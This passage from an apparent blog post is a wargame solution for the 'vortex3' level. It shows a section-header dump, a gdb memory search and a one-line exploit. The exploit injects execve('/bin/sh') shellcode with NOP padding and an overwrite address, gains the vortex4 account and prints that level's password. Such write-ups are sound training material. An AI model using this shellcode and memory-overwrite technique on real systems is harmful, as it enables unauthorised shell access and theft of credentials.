  [ 1] .interp           PROGBITS        08048134 000134 000013 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048148 000148 000020 00   A  0   0  4
  [ 3] .note.gnu.build-i NOTE            08048168 000168 000024 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        0804818c 00018c 000020 04   A  5   0  4
  [ 5] .dynsym           DYNSYM          080481ac 0001ac 000060 10   A  6   1  4
  [ 6] .dynstr           STRTAB          0804820c 00020c 000051 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          0804825e 00025e 00000c 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         0804826c 00026c 000020 00   A  6   1  4
  [ 9] .rel.dyn          REL             0804828c 00028c 000008 08   A  5   0  4
  [10] .rel.plt          REL             08048294 000294 000020 08   A  5  12  4
  [11] .init             PROGBITS        080482b4 0002b4 00002e 00  AX  0   0  4
  [12] .plt              PROGBITS        080482f0 0002f0 000050 04  AX  0   0 16
  [13] .text             PROGBITS        08048340 000340 0001ec 00  AX  0   0 16
  [14] .fini             PROGBITS        0804852c 00052c 00001a 00  AX  0   0  4
  [15] .rodata           PROGBITS        08048548 000548 000008 00   A  0   0  4
  [16] .eh_frame_hdr     PROGBITS        08048550 000550 000034 00   A  0   0  4
  [17] .eh_frame         PROGBITS        08048584 000584 0000c0 00   A  0   0  4
  [18] .ctors            PROGBITS        08049644 000644 000008 00  WA  0   0  4
  [19] .dtors            PROGBITS        0804964c 00064c 000008 00  WA  0   0  4
  [20] .jcr              PROGBITS        08049654 000654 000004 00  WA  0   0  4
  [21] .dynamic          DYNAMIC         08049658 000658 0000c8 08  WA  6   0  4
  [22] .got              PROGBITS        08049720 000720 000004 04  WA  0   0  4
  [23] .got.plt          PROGBITS        08049724 000724 00001c 04  WA  0   0  4
  [24] .data             PROGBITS        08049740 000740 000010 00  WA  0   0  4
  [25] .bss              NOBITS          08049750 000750 000008 00  WA  0   0  4
  [26] .comment          PROGBITS        00000000 000750 00002a 01  MS  0   0  1
  [27] .shstrtab         STRTAB          00000000 00077a 0000fc 00      0   0  1
  [28] .symtab           SYMTAB          00000000 000d28 000440 10     29  45  4
  [29] .strtab           STRTAB          00000000 001168 000216 00      0   0  1
$ gdb -q /vortex/vortex3
(gdb) break main
(gdb) run
(gdb) find 0x08048134,0x08049750,0x8049738
0x80482a4
0x8048322 
0x80492a4
0x8049322
(gdb) quit
$ /vortex/vortex3 `perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90"x106 . "\x22\x93\x04\x08"'`
$ /usr/bin/whoami
vortex4
$ /bin/cat /etc/vortex_pass/vortex4
32596d674b313d6a77
Posted by t0n1 0 comments
Labels: , ,
Subscribe to: Posts (Atom)